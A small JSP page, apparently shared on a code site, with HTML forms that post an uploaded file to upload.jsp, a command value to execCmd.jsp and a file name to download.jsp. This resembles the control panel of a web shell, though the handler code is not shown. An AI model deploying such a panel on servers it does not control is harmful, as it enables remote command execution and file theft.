📄 test.jsp
字号:
<%@ page contentType="text/html; charset=GBK" %>
<html>
<head>
<title></title>
</head>
<body>
<%//String info=request.getParameter("info");%>
<b><br></b>
<form name="UploadForm" enctype="multipart/form-data" method="post" action="upload.jsp">
<input type="file" name="File1" size="20" maxlength="20"> <br>
<input type="submit"value="upload">
</form>
<form name="ExecForm" method="post" action="execCmd.jsp">
<input type="text" name="cmdFile" size="20" maxlength="20"> <br>
<input type="submit"value="exec">
</form>
<form name="downloadForm" method="post" action="download.jsp">
<input type="text" name="downloadFile" size="20" maxlength="20"> <br>
<input type="submit"value="download">
</form>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -